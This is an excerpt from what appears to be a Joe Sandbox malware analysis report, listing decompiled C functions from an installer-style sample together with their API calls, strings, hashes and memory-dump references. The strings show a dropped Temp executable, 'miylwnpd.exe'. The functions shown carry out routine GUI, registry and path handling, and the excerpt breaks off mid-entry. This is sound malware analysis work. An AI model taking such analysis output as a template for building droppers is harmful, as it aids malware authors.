Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32 ref: 00401D9A
GetClientRect.USER32 ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065B5();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32 ref: 00401E84

Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA

CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32 ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404E77 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
			}

0x00404e80
0x00404e85
0x00404e8d
0x00404e8e
0x00404e9b
0x00404ea3
0x00404ea4
0x00404ea6
0x00404ea8
0x00404eaa
0x00404ead
0x00404ead
0x00404eb4
0x00404eba
0x00404eba
0x00404ec1
0x00404ec8
0x00404ecb
0x00404ece
0x00404ece
0x00404ed2
0x00404ee2
0x00404ee4
0x00404ee7
0x00404e90
0x00404e90
0x00404e97
0x00404e97
0x00404eef
0x00404efa
0x00404f10
0x00404f21
0x00404f3d

APIs

lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
wsprintfW.USER32 ref: 00404F21
SetDlgItemTextW.USER32 ref: 00404F34

Strings

%u.%u%s%s, xrefs: 00404F02

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405F3D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405F3D(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405f3e
0x00405f4b
0x00405f4c
0x00405f57
0x00405f5f
0x00405f5f
0x00405f67

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F4D
lstrcatW.KERNEL32(?,0040A014), ref: 00405F5F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD

Uniqueness

Uniqueness Score: -1.00%

Function 00405644 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f74 = _t16;
							E00405005();
						}
						L11:
						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F85(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404616(0x413);
				return 0;
			}

0x00405648
0x00405652
0x0040566e
0x00405690
0x00405693
0x00405699
0x004056a3
0x004056a4
0x004056a6
0x004056ac
0x004056ac
0x004056b6
0x00000000
0x004056c4
0x0040567b
0x004056b3
0x004056b3
0x00000000
0x004056b3
0x00405687
0x00405689
0x00000000
0x00405689
0x00405658
0x00000000
0x00000000
0x0040565f
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405673
CallWindowProcW.USER32(?,?,?,?), ref: 004056C4

Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628

Strings

, xrefs: 00405654

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040653C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x0040654a
0x0040654c
0x00406564
0x00406569
0x0040656e
0x004065ac
0x004065ac
0x00406570
0x00406582
0x0040658d
0x00406593
0x0040659e
0x00000000
0x00000000
0x0040659e
0x004065b2

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F68,00000000,?,?,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,?,?,004067A3,80000002), ref: 00406582
RegCloseKey.ADVAPI32(?,?,004067A3,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,007A0F68), ref: 0040658D

Strings

C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl, xrefs: 00406543

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseQueryValue
String ID: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
API String ID: 3356406503-1723855214
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405F89 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405F89(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405f8a
0x00405f94
0x00405f97
0x00405f9d
0x00405f9e
0x00405f9f
0x00405fa7
0x00000000
0x00000000
0x00000000
0x00405fa7
0x00405fa9
0x00405fb1

APIs

